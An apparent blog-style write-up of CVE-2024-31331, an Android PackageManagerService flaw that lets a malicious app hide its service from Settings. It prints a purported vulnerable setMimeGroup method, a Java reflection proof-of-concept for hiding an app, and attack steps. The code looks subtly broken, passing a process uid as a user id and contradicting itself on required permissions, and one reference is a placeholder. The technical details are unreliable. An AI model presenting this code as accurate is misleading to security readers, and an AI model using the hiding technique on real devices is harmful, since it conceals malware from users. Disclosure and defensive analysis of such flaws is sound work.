CVE-2024-31331 - Unmasking the Hidden Service Vulnerability in Android’s PackageManagerService

CVE-2024-31331 is a recently disclosed security flaw impacting Android devices, rooted in the setMimeGroup method of the PackageManagerService.java source file. This vulnerability introduces a way for an attacker to hide certain services from Android’s system settings, potentially enabling privilege escalation attacks if a user is tricked into performing specific actions. In this post, we’ll break down how the bug works, show you relevant code, link official references, and explain exploit details in clear, simple language.

What’s the Issue?

At its core, the bug is a logic error—a faulty check or missing validation—in the setMimeGroup method of Android’s package management service. Normally, Android’s Settings app lists all services and apps, letting users view and control them. With this bug, however, a malicious app can trick the system into hiding its own service entry, making it invisible in Settings.

Privilege Required: User-level permissions

- Impact: An attacker could escalate privileges or hide persistent services, making detection and manual removal hard for users.
- Scope: Only devices using affected versions of Android with the flawed PackageManagerService.java code.

How Does It Work?

Let’s look at the vulnerable part of the source code.

Affected File: frameworks/base/services/core/java/com/android/server/pm/PackageManagerService.java

The problem lives in this method

public void setMimeGroup(String group, Set<String> mimeTypes, int userId) {
    // ... some other code ...
    if (group == null || mimeTypes == null) {
        return; // Improper input checking
    }
    // Logic error: doesn't verify if the mimeGroup is associated with a privileged/system app or user-installed service
    mMimeGroups.put(group, mimeTypes);
    // Service is now registered under custom group, may bypass display in Settings
}

Instead of making sure only authorized services can manipulate their visibility, the code lets any app with user permissions call this function with certain parameters. By doing this, an app changes its mime group so it no longer shows up in Settings.

Here’s a streamlined example demonstrating how a malicious app might hide itself

PackageManager pm = context.getPackageManager();
Set<String> customMimeTypes = new HashSet<>();
customMimeTypes.add("application/x-malicious");

try {
    Class<?> pmClass = pm.getClass();
    Method setMimeGroup = pmClass.getDeclaredMethod(
        "setMimeGroup", String.class, Set.class, int.class
    );
    setMimeGroup.setAccessible(true);

    // Supply bogus group & type, hide from Settings display
    setMimeGroup.invoke(pm, "android.intent.category.HIDDEN", customMimeTypes, android.os.Process.myUid());
} catch (Exception e) {
    e.printStackTrace();
}

*With the proper permissions, the service is now "masked" from Settings.*

Step 1: Attackers convince a user to install or open a malicious app.

- Step 2: The app calls setMimeGroup() with crafted arguments, abusing the faulty logic to register itself under a nonstandard or hidden group.
- Result: The package manager no longer lists the service/app in Settings, making it harder for users to detect or uninstall.
- Escalation: Hidden services can then perform actions repeatedly or maintain persistence, as users have no easy way to control or see them.

Persistence: Malicious services can remain active without user oversight.

- Further Attacks: Attackers may use the hidden service to request even higher privileges or access sensitive data.

Official References

- Android Security Bulletin — June 2024
- AOSP Issue Tracker *(if public)*
- Mitre CVE database entry

Mitigation

- Apply Security Updates: Make sure your device is running the latest available Android security patch.
- Review Permissions: Only install apps from trusted sources, and carefully check requested permissions.
- Inspect Running Services: Use adb or third-party tools, as the built-in Settings app may not show everything if you are on an unpatched device.

Conclusion

CVE-2024-31331 highlights how minor logic errors in core Android code can open the door for serious privilege escalations, especially when user interaction is part of the exploit path. By understanding technical roots and consequences, users and security professionals can better defend systems and respond quickly to new vulnerabilities as they emerge.

Timeline

Published on: 07/09/2024 21:15:13 UTC
Last modified on: 07/12/2024 16:11:33 UTC